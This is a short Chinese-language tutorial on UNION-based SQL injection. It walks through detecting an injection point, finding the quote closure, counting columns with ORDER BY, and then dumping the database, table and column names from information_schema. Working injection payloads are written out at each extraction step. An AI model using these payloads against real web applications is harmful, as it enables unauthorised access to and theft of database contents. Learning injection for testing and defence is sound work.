sql注入之union注入
聯合查詢注入利用的前提: 必需要有回顯
聯合查詢過程:
- 判斷是否存在注入點
- 判斷是什麼類型注入(字符型or數字型)
- 判斷閉合方式
- 查詢列數個數(order by)
5, 得到數據庫名 - 得到表名
- 得到字段名
1. 判斷是否存在注入點 能夠用(')單引號顯示數據庫錯誤信息或者頁面回顯不一樣
2. 判斷什麼類型(字符型or數字型) 用and 1=1和and 1=2 若是頁面沒有變化說明不是數字型 ,若是有明顯變化說明是數字型
3. 判斷閉合方式 單引號or雙引號..看報錯信息、
4. 判斷列數個數(order by) order by在mysql中查詢結果是按照指定字段進行排序的,例如數據庫中有3個字段,order by查詢就是1,2,3
5. 查看數據庫信息and得到數據庫名 使用group_concat()
基本語句:
1' union select 1,(select database()),3--+
1' union select 1,(select group_concat(schema_name) from information_schema.schemata) --+
6. 得到表名
基本語句:
0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
7. 得到字段名
基本語句:
0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='表名'),3 --+
相關文章
- 1. SQL注入(union注入)
- 2. sql注入-union select
- 3. SQL注入基礎:1.union注入
- 4. union注入
- 5. SQL注入之cookie注入
- 6. sqli-labs之union注入
- 7. SQL注入:Sql注入之sqlmapapi介紹
- 8. SQL注入之-盲注
- 9. SQL注入之寬字節注入
- 10. sql注入之二次注入
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • YAML 入門教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. SQL注入(union注入)
- 2. sql注入-union select
- 3. SQL注入基礎:1.union注入
- 4. union注入
- 5. SQL注入之cookie注入
- 6. sqli-labs之union注入
- 7. SQL注入:Sql注入之sqlmapapi介紹
- 8. SQL注入之-盲注
- 9. SQL注入之寬字節注入
- 10. sql注入之二次注入